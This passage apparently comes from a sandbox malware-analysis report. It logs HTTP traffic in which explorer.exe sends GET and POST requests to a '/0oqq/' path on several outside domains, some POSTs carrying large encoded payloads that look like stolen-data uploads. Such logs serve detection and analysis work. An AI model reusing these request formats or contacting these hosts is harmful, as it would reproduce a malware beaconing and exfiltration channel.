Htp(xVskZb1GVWy5zCUZlY0zk6u(DsD2M3W7tevmm~sljTVk2R1g5H4STaNAC9RxaKDS-acKcYJbpzoKn9CD2im9iwY9o7eeYwr9Gg0CzgT4eectoPpkWaQAxql8Y3qZETM4VEU~nivJWnN3nCXHTSbX78bHcgxHsQn9ix8CVo5MxalJpKY8osr0840mEW_7u4c7dX54pZA5xxuZq6EAakhM6UuwABVphZkZyjFlpnhPqdoNQLZiDNNVOelL_qap4bAyhLund6fQPTqg5mAEVfra7jxjCLsRCh94pj7rMmd33Xub9X6ovmxOt4DBCK_Gcu5q8a3QPx3r0lMxt08tC3ilhs4RWi7buXY12gKqykeG1~dFurle3uJtb~CI86up0ufbUeJSO0XHUL2RPrUkMFyFRwMbx3N1ZwRT3cfcRmTl-B9NiPQqy3A44BhS-8C1KN_D0wGt-H0l7DBLcCzqYnByovuzItb9AcBYgETMIx0ZlMBcv8p5yh4Xz4Xc8VKkLVT0z3h8TzDGlZ0CcoyBJzq2T04Wb3uc128xjqq1cjM6LCPLfwpUCpdI4rTRwuNWW(Uo6B885jtyFh1hdv8KAl_scmRFNEJt_Im9PsVdZ5Y1gQPZWloLUGKjP(MAm3Ksxc8NblSw6ypmvwtEEWdfciHUE9KWyta5BpzGC2A6uMF35E99zvfj0wFhOFJZ4hmc19Q6nuIxZagw1nRkI4wUL03HEvqfFQ_JDgRFz7exln8E878wVUuoYMYmuyAdNEKgZ5rA07Ieb8f4cAXRSoQaK~NG_L_J0a062bnFc~R6e5058fENbf9KGytPd4w(FkPjKS7dqlDRvZsU_ii7WSUqd~2r655u6zSc4cWbq~ayJ(_5inrTIkkLkefL8gI5VUKI3JrwmarTpn_A01LFEcjJpiRM3Vaqa(C0ksMjfR1Z8kwKPk37lYkl37uytR4a6~OgRy1CGBJYuEvnaevdO0U2b5-TYurJSGzrfBlYVPZH2UpAOMyPzQ4hHTfGwFEFf0pW70ADqzL2TcBEh6sQ1ZQCpH3u8RFXGPSy1HbaOEmuaLSglC555w-rb6jx09mvlORTfNP9zrCp5(cZUArSgd_BwNV3N7dNimBJ398qc7KvQVCZJEi42EXBSGdfccIU8me6EdcQ2QNzRCK7cFlxEhBdPSSvzgawShnKbFdx5dlhYB96OgsPbXWMenCwoXQhrHOMKB1x2Fu(28O0ogZIGziWwbAA7kF60yMc-bVhI4sZ1BJ7BH6C8Zqrd4g~JF28wBr(HlUsTlTBXgMgqs_fnmqCwSbRob5su2p9qUPC3Dw0iQiK_wp0mGaj63ECElF7GT1t0rd5zeTSqrj1_FJu7o0r-fLFi45lXpKqMrIm8Z9~z9SfeHTg_ym~54ECJvh1nJsrTZWjcDay1Lq1inutCINNLxZcJ1U7emCi7PJlyTtHIPyQMV5zuMg0A8At_EbBNUvURmjA04WbYrri2y2NVfxrVhitjF1EmKbR9eA2q1WaAHCL_f-pMZEHaxi4hJ7ROmQrjypdhs8jZ5fuBxGE8L0X9p4ezr_HHTRYrQytGSLl3aYIIXk2xmaDKkefzwX9qq5hVRcjt~SNNC-1v~XypiITyGHngphEkx-RyEBYfjMyhOf7hK3pn2-bHHDHO8g8IoD~fzvhsv3DB1vhZoq4kjDw5bdz5E21Ut7nFGX(8uiLuDIzzhoPUZEVdorfTZVeBha7TMnz7YChzYnUPOr4S8kgFYuoXFvci6X0oX7tKs4X0T309aw46v9Dpq1n0o_If7SzdipXsm4AxHPLTjOeQ6HwiYLTZFd5BKPDK7rP6VSNoOggtD3xUY25EDQ0Hp9T4(sGIFBWp7X7S91zIAzrDVemzobkrXXcb~yfV99UXU4iBiMPeGnzZoGpNLd4uIj22gwQm8Xnu2BTBUEgSNiGSWDSefQ8_s00POmAsGRcu~gM3gO7WR_EfZr8mW3c8~HNP6No4jLVeTotYokjg8pEl4oj8C3seUlKNQbXwxcVkNPkEsydmRbevdHCvqdqWMZeUgScRs1AqD9IoonLd9eKVnOcYogW8xYdutviLWX5_Xd0TVygZyxHJ2DQy
                                                                                                                      Mar 20, 2023 09:10:49.823268890 CET313INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Mon, 20 Mar 2023 08:10:49 GMT
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Content-Length: 203
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 30 6f 71 71 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /0oqq/ was not found on this server.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      3192.168.2.349702198.58.118.16780C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:08:39.198573112 CET144OUTGET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=uTgIqe0UraKbEL8bVan9urdYcpPucjhGk2sL3YY9ls8dblQwqoiZoebTO/nXMXVf1qLfWs/b3Kzx4hfR3b8+tPCCgrVHYEBTbA== HTTP/1.1
                                                                                                                      Host: www.virginhairweave.co.uk
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                      Data Ascii:
                                                                                                                      Mar 20, 2023 09:08:39.338808060 CET145INHTTP/1.1 403 Forbidden
                                                                                                                      server: openresty/1.13.6.1
                                                                                                                      date: Mon, 20 Mar 2023 08:08:39 GMT
                                                                                                                      content-type: text/html
                                                                                                                      content-length: 175
                                                                                                                      x-fail-reason: Bad Actor
                                                                                                                      connection: close
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      30192.168.2.349729203.245.24.4780C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:10:52.331121922 CET314OUTGET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=Yikzj9CFq5vqEc2vNlbzxihd8s3DrMcGxuzxagcCy5X6CzTVIy/a14lT5vlHy5RQ1Z7Px0aDVF6+DD/SwGM+3qMYWad3MBh6/g== HTTP/1.1
                                                                                                                      Host: www.fanversewallet.com
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                      Data Ascii:
                                                                                                                      Mar 20, 2023 09:10:52.588248968 CET314INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Mon, 20 Mar 2023 08:10:52 GMT
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Content-Length: 203
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 30 6f 71 71 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /0oqq/ was not found on this server.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      31192.168.2.349730217.160.0.24980C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:10:58.190454006 CET315OUTPOST /0oqq/ HTTP/1.1
                                                                                                                      Host: www.karlscurry.co.uk
                                                                                                                      Connection: close
                                                                                                                      Content-Length: 189
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Origin: http://www.karlscurry.co.uk
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Accept: */*
                                                                                                                      Referer: http://www.karlscurry.co.uk/0oqq/
                                                                                                                      Accept-Language: en-US
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Data Raw: 49 43 48 79 76 6a 35 3d 79 79 46 59 4b 74 73 72 35 31 36 4c 73 41 4a 4b 72 4c 31 55 6d 38 75 68 31 63 70 37 42 6b 75 30 43 4a 43 49 4f 43 51 72 6d 6e 72 5f 53 43 28 68 76 50 50 51 32 62 4d 62 35 4d 67 65 62 56 4c 6d 62 5f 6d 75 28 5a 6b 54 58 71 58 32 4a 4f 6c 6f 39 6e 64 43 78 54 34 73 6f 70 78 6b 6d 5a 50 69 6b 4a 49 7a 71 6c 57 4e 56 77 77 2d 57 54 53 4e 46 34 59 59 54 54 56 5f 53 50 34 72 59 44 6d 71 76 37 6a 4b 42 47 47 37 52 4a 72 4b 63 59 47 31 63 44 64 75 4c 4a 6f 76 4c 56 41 57 6f 4f 49 72 35 56 62 36 53 61 35 4d 73 50 48 30 6c 46 74 54 6a 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                      Data Ascii: ICHyvj5=yyFYKtsr516LsAJKrL1Um8uh1cp7Bku0CJCIOCQrmnr_SC(hvPPQ2bMb5MgebVLmb_mu(ZkTXqX2JOlo9ndCxT4sopxkmZPikJIzqlWNVww-WTSNF4YYTTV_SP4rYDmqv7jKBGG7RJrKcYG1cDduLJovLVAWoOIr5Vb6Sa5MsPH0lFtTjw).
                                                                                                                      Mar 20, 2023 09:10:58.218595982 CET316INHTTP/1.1 404 Not Found
                                                                                                                      Content-Type: text/html
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Date: Mon, 20 Mar 2023 08:10:58 GMT
                                                                                                                      Server: Apache
                                                                                                                      X-Frame-Options: deny
                                                                                                                      Content-Encoding: gzip
                                                                                                                      Data Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 72 38 24 6b 5b 3e 6a 05 8d ce 88 67 4d e2 92 72 8e 84 e1 c0 ab fc a0 24 7d 49 e8 0f 73 20 45 8e d8 95 0e 11 93 8b c9 74 0e 8d 58 53 d3 36 fb a1 d6 a2 f1 67 91 71 d5 74 be 7b e7 92 70 b5 d0 c6 75 cf 8c a3 ed 42 c4 9d 1f 9e 5e d2 12 48 26 c1 76 c0 7b 31 22 8e fa ac cd 0d 2d dc fe 7a 3c 8a a5 e8 a3 fd 96 48 9d b7 0d 1b 32 59 19 72 f8 ea c0 f4 dd 82 8c e2 ff e2 40 2d 54 d9 8a 92 9d fc cc e8 f7 9e 33 18 0d 42 ed 20 df c0 c8 9a 3c 09 a2 c8 a2 d4 7c f9 27 d6 7a 92 eb 26 2a 4c d3 1d a3 53 fd 2b 1e 0d bd 9a d4 3a 17 8e b4 9a 54 da 3a 60 d8 93 8d a3 4f e9 6d 7a 7f d7 53 7e fb 72 8a 67 14 75 d7 99 3c f2 cc 0c 97 32 67 fc 33 ea 15 fa a7 e4 75 b7 10 bc 02 5e 11 ef 5f ef 1b fb d8 7d e7 fe 02 e4 39 6b fe f7 04 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      32192.168.2.349731217.160.0.24980C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:11:00.747848988 CET322OUTPOST /0oqq/ HTTP/1.1
                                                                                                                      Host: www.karlscurry.co.uk
                                                                                                                      Connection: close
                                                                                                                      Content-Length: 5337
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Origin: http://www.karlscurry.co.uk
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Accept: */*
                                                                                                                      Referer: http://www.karlscurry.co.uk/0oqq/
                                                                                                                      Accept-Language: en-US
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Data Raw: 49 43 48 79 76 6a 35 3d 79 79 46 59 4b 74 73 72 35 31 36 4c 32 6a 52 4b 34 34 4e 55 71 4d 75 75 37 38 70 37 57 30 76 5f 43 4a 4f 49 4f 48 70 77 6d 55 48 5f 53 31 6a 68 73 71 37 51 30 62 4d 62 70 38 67 61 57 31 4c 4f 62 37 50 66 28 63 5a 73 58 6f 62 32 4b 39 4e 6f 72 33 64 44 77 7a 34 70 76 70 78 6e 69 5a 50 69 6b 4a 4d 5a 71 6b 57 64 56 79 73 2d 57 6c 6d 4e 46 36 41 62 52 44 56 79 65 76 34 72 59 44 61 62 76 37 6a 61 42 47 66 38 52 4b 7a 4b 4e 62 75 31 66 57 70 74 63 4a 6f 6f 49 56 42 52 7e 4d 70 61 77 6b 6e 70 5a 72 74 65 6d 6f 4f 55 70 33 6b 2d 68 54 42 5a 6d 43 71 5f 66 63 7e 66 54 48 63 6f 74 66 6d 7a 62 31 45 38 73 79 44 6a 74 61 4e 71 6b 67 59 73 79 6d 65 33 50 6a 4f 33 6c 31 56 79 39 44 7a 62 66 49 70 42 38 31 33 4c 74 56 71 75 68 76 69 2d 6f 30 34 34 28 45 4c 72 28 33 66 79 66 4e 6d 61 65 7a 48 64 43 44 6e 68 56 79 33 6f 67 62 48 4d 48 4a 33 6b 54 63 50 67 28 39 6b 44 73 55 4e 79 42 4d 61 6c 76 67 43 4e 4c 42 43 49 4b 52 57 66 30 6d 74 6d 58 56 34 66 4a 38 70 45 63 4d 76 30 6d 53 48 6c 31 49 4b 6c 64 48 72 5a 6d 65 6b 69 62 33 69 33 63 50 6d 2d 76 38 4d 46 78 78 7e 65 62 75 4d 70 4b 38 69 62 54 47 37 56 67 47 4e 32 50 52 69 77 77 44 74 4b 45 30 31 55 69 35 4e 55 55 78 56 48 67 68 4d 51 7a 37 4b 66 4c 36 41 33 49 43 4a 65 55 4a 37 72 67 70 6f 70 6e 52 62 6a 4b 55 77 41 54 49 28 42 5a 34 33 4a 65 39 55 58 4e 61 72 52 44 66 6c 4e 4d 61 68 69 33 56 53 2d 38 43 70 2d 41 69 65 57 68 4f 48 43 59 6d 4a 46 4f 64 6e 4d 5a 72 56 53 37 52 4c 42 75 4d 72 36 78 62 4a 44 31 6d 4b 4f 4c 69 7a 77 74 51 48 37 75 73 54 47 56 32 6b 6c 31 32 4d 37 57 41 30 4d 64 39 6b 41 30 66 6c 76 6c 47 47 57 78 4b 59 61 32 39 46 65 38 37 6f 31 73 6f 7e 4b 66 51 51 52 76 5a 4d 77 50 44 4d 63 50 57 31 66 36 79 64 4c 51 30 46 51 46 58 35 66 32 76 74 30 49 49 58 53 35 33 39 67 70 68 42 4e 73 67 73 30 44 74 37 50 64 70 50 77 6d 56 41 2d 63 45 36 4a 79 5f 28 4f 47 6a 4b 54 4a 73 4f 34 6c 36 71 78 5a 34 4b 35 35 5a 4a 5a 73 64 45 37 48 55 78 7a 78 6c 38 30 33 5f 68 35 39 66 6c 77 67 4e 77 45 38 69 32 4b 65 39 4b 33 39 34 57 69 62 6e 57 4b 71 77 42 6b 49 49 77 63 44 45 57 7a 78 76 4f 55 33 76 4d 31 6b 37 65 58 6c 6b 6c 72 71 69 74 51 63 43 7a 72 72 75 47 4a 6e 42 45 48 66 6d 65 31 51 5f 77 57 64 77 5a 62 74 72 56 72 6a 64 78 57 42 66 44 79 72 44 50 79 57 64 4d 68 47 2d 4b 58 38 71 51 52 61 56 7e 56 79 4c 6b 38 55 4b 56 5a 45 30 48 5a 4f 4b 50 76 70 52 68 35 4c 56 32 5a 56 6e 6d 45 57 4c 6d 6f 71 58 68 59 28 6c 41 31 4a 4f 32 51 33 64 4a 34 64 4d 47 39 64 38 61 78 4c 45 4d 71 4d 7a 4a 6e 4f 52 78 45 4b 6d 6c 4b 66 47 46 49 31 71 4b 2d 42 41 77 59 55 78 72 42 72 78 39 63 64 58 35 6b 4f 5f 4b 43 28 6b 38 64 48 34 72 39 55 58 48 50 71 4f 4f 42 56 54 50 4f 76 54 56 44 73 6d 6b 57 5a 5a 69 30 31 46 52 4c 53 33 69 4a 51 6d 7a 34 32 4c 6c 67 67 37 7e 39 77 59 6b 6a 67 52 6f 55 69 49 4b 50 4a 74 45 61 49 6e 66 5a 53 33 39 30 77 49 50 52 76 5f 37 37 62 42 73 4f 28 4c 46 75 75 6a 7a 48 7a 31 34 36 4b 4b 6e 68 32 48 4a 69 28 44 6c 75 4c 4c 4c 4b 66 65 35 38 55 34 58 63 61 4f 77 72 70 6d 34 59 36 41 32 5f 56 79 42 73 7e 41 34 67 65 2d 41 47 30 6f 4c 56 65 73 77 70 6a 5a 77 74 39 4f 33 76 68 72 47 67 69 51 77 63 6f 6c 72 51 34 63 54 71 52 41 6d 62 50 4e 36 32 48 55 42 43 4a 32 64 6a 47 47 6d 52 78 6d 6e 61 34 46 54 4d 66 50 37 71 36 35 54 41 70 41 35 6e 41 37 62 37 32 70 38 65 28 70 70 53 54 6a 50 53 7a 6d 4b 7a 72 34 4b 6d 41 76 50 56 52 31 7e 68 30 69 6e 64 73 78 77 56 71 51 64 5a 51 42 39 4e 64 64 57 4c 6b 47 64 41 30 41 56 76 61 33 78 33 6f 43 56 62 61 63 44 67 35 4d 4a 66 7e 71 70 71 49 59 75 73 5a 6f 66 4a 79 6d 6a 6a 4f 32 76 35 64 65 41 58 78 38 61 54 4b 39 39 32 4f 33 51 31 6a 48 4e 48 58 68 58 42 62 4c 37 76 71 7a 54 5a 66 42 50 6a 58 4f 53 4e 67 62 74 48 61 2d 72 74 42 4a 39 55 57 77 38 4e 6a 52 56 6b 35 33 39 51 74 35 7e 77 58 65 6d 6e 7a 30 46 56 28 66 34 34 6b 5a 63 70 55 41 55 77 76 66 4a 63 53 45 48 66 41 64 50 62 56 49 78 33 75 76 6d 44 42 6a 70 77 75 4e 42 65 62 5a 55 4f 54 41 77 6d 75 4a 7a 71 33 62 39 7a 4e 49 75 67 49 78 68 34 68 33 79 75 63 51 67 75 4a 7a 74 5f 7a 64 42 61 4f 73 39 36 78 73 79 2d 4f 31 48 6b 61 7a 68 61 33 63 56 4b 70 61 79
                                                                                                                      Data Ascii: ICHyvj5=yyFYKtsr516L2jRK44NUqMuu78p7W0v_CJOIOHpwmUH_S1jhsq7Q0bMbp8gaW1LOb7Pf(cZsXob2K9Nor3dDwz4pvpxniZPikJMZqkWdVys-WlmNF6AbRDVyev4rYDabv7jaBGf8RKzKNbu1fWptcJooIVBR~MpawknpZrtemoOUp3k-hTBZmCq_fc~fTHcotfmzb1E8syDjtaNqkgYsyme3PjO3l1Vy9DzbfIpB813LtVquhvi-o044(ELr(3fyfNmaezHdCDnhVy3ogbHMHJ3kTcPg(9kDsUNyBMalvgCNLBCIKRWf0mtmXV4fJ8pEcMv0mSHl1IKldHrZmekib3i3cPm-v8MFxx~ebuMpK8ibTG7VgGN2PRiwwDtKE01Ui5NUUxVHghMQz7KfL6A3ICJeUJ7rgpopnRbjKUwATI(BZ43Je9UXNarRDflNMahi3VS-8Cp-AieWhOHCYmJFOdnMZrVS7RLBuMr6xbJD1mKOLizwtQH7usTGV2kl12M7WA0Md9kA0flvlGGWxKYa29Fe87o1so~KfQQRvZMwPDMcPW1f6ydLQ0FQFX5f2vt0IIXS539gphBNsgs0Dt7PdpPwmVA-cE6Jy_(OGjKTJsO4l6qxZ4K55ZJZsdE7HUxzxl803_h59flwgNwE8i2Ke9K394WibnWKqwBkIIwcDEWzxvOU3vM1k7eXlklrqitQcCzrruGJnBEHfme1Q_wWdwZbtrVrjdxWBfDyrDPyWdMhG-KX8qQRaV~VyLk8UKVZE0HZOKPvpRh5LV2ZVnmEWLmoqXhY(lA1JO2Q3dJ4dMG9d8axLEMqMzJnORxEKmlKfGFI1qK-BAwYUxrBrx9cdX5kO_KC(k8dH4r9UXHPqOOBVTPOvTVDsmkWZZi01FRLS3iJQmz42Llgg7~9wYkjgRoUiIKPJtEaInfZS390wIPRv_77bBsO(LFuujzHz146KKnh2HJi(DluLLLKfe58U4XcaOwrpm4Y6A2_VyBs~A4ge-AG0oLVeswpjZwt9O3vhrGgiQwcolrQ4cTqRAmbPN62HUBCJ2djGGmRxmna4FTMfP7q65TApA5nA7b72p8e(ppSTjPSzmKzr4KmAvPVR1~h0indsxwVqQdZQB9NddWLkGdA0AVva3x3oCVbacDg5MJf~qpqIYusZofJymjjO2v5deAXx8aTK992O3Q1jHNHXhXBbL7vqzTZfBPjXOSNgbtHa-rtBJ9UWw8NjRVk539Qt5~wXemnz0FV(f44kZcpUAUwvfJcSEHfAdPbVIx3uvmDBjpwuNBebZUOTAwmuJzq3b9zNIugIxh4h3yucQguJzt_zdBaOs96xsy-O1Hkazha3cVKpayHzbusk_SQ4wQPzfGeS_PPk2egMgOwbsnb61BBKKUUr4rFPfFWjethgG73ntdCnf24VaM4UyDIU3lxAeSKoQDdmMz4OU3RnBg8MghnWtt7g_rDnrOby6ErCjq-GN~SXEmqu0pBgdjn2UTSPjOTtA7nQRNE9GbwLIxsFgZgj_ZqsMGOnVZErFim838q9FmAiNmjoESyY8U2IdjJXd6Y~UAZDFc5VPuoSpx3j7oAn3JyVG9hzgEw46KFWRHYnVPzub6DfTimYsmirsoBWhBHHf8sfmZcq7Nj8mskjD50z8Bqvd(_UcXys_6yNynXHtRwXOnrxYaX(DQ0l4rpTiGHE4w0(PHURV1DLrmB(2lMCZXllai0UM~Qz_U1ZeqRLSvv7ehWSHiMNVdsAkFTKug_X-ycT5GU9dfHrLzvvswVe-1OkqvS0rvM7NaEVuUL~xe93IL7aqlsyYk7yKYoh1~UCX4olDG4w31wLKMHe1JFpxI480mhqNiwVsLh8kZQUimYJ-588a(2mAAVGGZsjAO7jzyaZGYD0C(WNGAHDPItn7DrJbGsgbE4bnOJXh49ElSnBjWCg0rsCyem7XY_JR1uc7Mf8fWnhyjD4gEXAfiVy-1ynoB_epxBG3FC0SmmvgF93ry1(-b9Y9K6BApGeKDURpPs5WXNQ4NSyOfAVNvsRi8vcJIDRYgGTxtm7-eZ58wf2GkkqAyl6TLM4hAcM8XOVYsSrmrHaMG32LbT1p~QBrrL1L2yuvV8gSXSHT89FvUhg_WciIlnnL(wmUmu3Y80~vB9(GEvrSAPttqxc_D5WHAgbz3-pGo8gtV3aW~fOUUwwY~2Ao4aT1dSkyBTVwKBQ_~aKGPlrBdtorGWdWhiQsKQCW5e3SGiHSFZlsS_uGB2ZruYBg3IsPBoMdeSWv1p6eJZZfuBdsGmxPRo1LBzPLM81o7scAUYP1Qn5jpGvU74PyVv8nYa~q(VH364lYEbUQufO0j4sqVmLtQdFTOteQMHx44SLyhOJ715vOP7Mx2oeOyCUxP54jiebC1AwbcjtRrnJCw2VVbUhU5wD7r-LWJigcxZfFF66wTT9BAaeYKIHuu7DQrsf3s4ty1xuHSZsKU9qcucbtERiJG2SsN9iZ0yVxbif7yERi(SzRqfKWS5Ti6FoY6bAZqftCblOWui0eCnihuxIYSrtmKVojl_ZLZwMSI1tbWdXQPtYi(QmHs0pkWeT2H-5ttHN8a2cXRcV8BOa-CdwxML3d5z4qX6aMuPTqfS1vSzt74l0qGn(xoR5sD6WI8HLpkYjqNCUAhED3Oy8_CW8UVKWiEFrqqHiQc8Dy1pGRmxEaMWA8Cz9LRXvqGh~BTcsb0xAZ0yICKJsZd-cUTZpt(5akpEoEWriSm4ZHPjMt~ytRtvwtlLA2p6GyEx~5QnQmN6ZhFN0Tk8TQvNQ85XQsFH4DoE3Q~IZtpO0b293nMxyrhiylA3pRSQGvUpBdUGVQtllCG8VfLDwqkIDl(WC-ty9U5Gdf5xmb2aI0QPkWSXPvD8zpPPRgyuF-Q-lOyGpQNBclQLpABw2JuG7TS4gDz5mjtJQ_HoVwINxe4nNj~N0l3IdYYbaGHylNWbuve_03LN8IzkK08zpLohBt0OsxquxEUBjr0nBb91kDHG0JZSlpa-P1~UY0a-hhMdIb0V(0xeZwuWH-KVObB_es(8i73dNpKUgihnzC~fEyIbIQLXxIZW8XMRiXyxYLloFfkccfV_wypjV8VVEA100Kq14vkiuDnXkzCG1HM4hWZcjA7aFnkN3FxrYQEvnopqRCQSof8HPwgnOGvk1RvVx-cIvIfZKW1zu9Cg3ztNC6Xlll7X1KstqzwHAbt3nvx3ns(n9qfMZaLPUKgURFbDF5iWFAPsQWs_pwP_Oiw-wrWoye2xKjSMGsKDdfBWYpVWxG9Z729FK0yUXWdw4Yw6yAUHXh1VL5cHQnNRMjBfMfFVn1GcJk5TtLDSi5zcz_Y07N42AOdMKULc(Tm6QQzZfp7RQc0OjWk2AHtR4Q80OLydMypa1kZHgDVyGu3bUvnQvFhAQqVSBjZ4JAMOaMKVkZZFsdY4Fr7dZX~T3liP3j~y5YO3gq7OnOwozzkBjgXQk-s1uxT6LCbdAaAoQNWYyRad44N3x5pSjpWaFEZolVBcSTxG4GoKQwhBiaf3CzYa~_t8VTe0JarkhNAFjCwltygQYOkVj1i0ofS8xWW58dvKUR7GKz16wwS9vWh4E4CTPewacFJLMsUiyQ74OykYMyaccDYOsa90(WUSzxPDt1AFzbCzMCo_vTXSAGhF6XekiyQ3cMN0HaBf~yYl6hkSUvtGaCYFb